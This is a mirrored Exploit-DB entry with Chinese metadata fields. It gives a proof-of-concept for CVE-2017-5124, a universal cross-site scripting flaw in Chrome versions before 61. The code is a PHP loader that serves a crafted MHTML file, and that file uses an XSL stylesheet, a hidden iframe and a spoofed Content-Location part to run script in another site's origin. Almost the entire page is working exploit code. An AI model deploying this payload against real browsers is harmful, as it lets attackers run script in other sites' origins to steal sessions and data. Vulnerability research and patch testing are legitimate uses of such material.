Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting

  • 作者: Anton Lopanitsyn
    日期: 2017-10-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45867/
  • <?php
    $filename=realpath("PoC.mht");
    header( "Content-type: multipart/related");
    readfile($filename);
    ?>
    
    
    
    
    MIME-Version: 1.0
    Content-Type: multipart/related;
    	type="text/html";
    	boundary="----MultipartBoundary--"
    CVE-2017-5124
    
    ------MultipartBoundary--
    Content-Type: application/xml;
    
    <?xml version="1.0" encoding="UTF-8"?>
    <?xml-stylesheet type="text/xml" href="https://www.exploit-db.com/exploits/45867/#stylesheet"?>
    <!DOCTYPE catalog [
    <!ATTLIST xsl:stylesheet
    id ID #REQUIRED>
    ]>
    <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="*">
    <html><iframe style="display:none" src="https://google.com"></iframe></html>
    </xsl:template>
    </xsl:stylesheet>
    
    ------MultipartBoundary--
    Content-Type: text/html
    Content-Location: https://google.com
    
    <script>alert('Location origin: '+location.origin)</script>
    ------MultipartBoundary----